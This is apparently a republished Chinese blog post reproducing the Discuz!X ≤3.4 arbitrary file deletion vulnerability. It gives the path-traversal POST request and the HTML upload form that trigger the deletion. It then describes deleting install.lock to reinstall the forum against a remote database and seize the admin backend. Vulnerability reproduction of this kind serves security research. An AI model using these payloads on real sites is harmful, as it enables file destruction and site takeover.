前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Discuz!X ≤3.4 任意文件删除漏洞复现+GetWebshell

Discuz!X ≤3.4 任意文件删除漏洞复现+GetWebshell

作者头像
用户1467662
发布2018-03-30 12:06:04
5.3K0
发布2018-03-30 12:06:04
举报
文章被收录于专栏:农夫安全

今天看到一位师傅发了一篇分析的文章:

【漏洞分析】Discuz!X ≤3.4 任意文件删除漏洞分析

复现的话需要源码在网上还是找到了

那我们根据文章所知的几个步骤:

1.修改出生地为文件相对路径

发送POST请求:/home.php?mod=spacecp&ac=profile&op=base

POST正文为:birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b

formhash为用户自己的,所以这里在网页上找一个对应填写过来就OK:

请求完成之后出生地会修改为../../../test.txt

2.上传文件

这里构造了一个上传表单:

<form action="http://192.168.0.10/dz3.4/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">

<input type="file" name="birthprovince" id="file"/>Formhash: <input type="text" name="formhash"/>

<input type="hidden" name="profilesubmit" value="1"/>

<input type="submit" value="Submit"/>

</from>

发送过去后发现成功删除了:

漏洞复现成功,那在这里呢我们思考一下能否进行扩大化危害的测试?于是想到了删除安装程序锁(/data/install.lock)

复现上文步骤删除它即可:

删除完成之后,就可以重新安装了:

在我们进行设置数据库的时候有人就问了,你又不知道数据库账号密码,能怎么办?我们可以使用“站库分离”的思路来设置,使用远程数据库即可。

进了后台自然什么都OK了啦:

至于怎么getshell,相信大佬们一堆姿势~~

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-12-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
Discuz!
Discuz! 是全球领先的论坛社区应用系统,自2001年6月面世以来,服务超过300多万网站用户案例。现在,借助 Discuz! ,您不仅可以使用搭建传统的社区论坛,更可轻易的构建面向移动互联网时代的私域流量和社交圈子类的应用,并快速启动业务。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档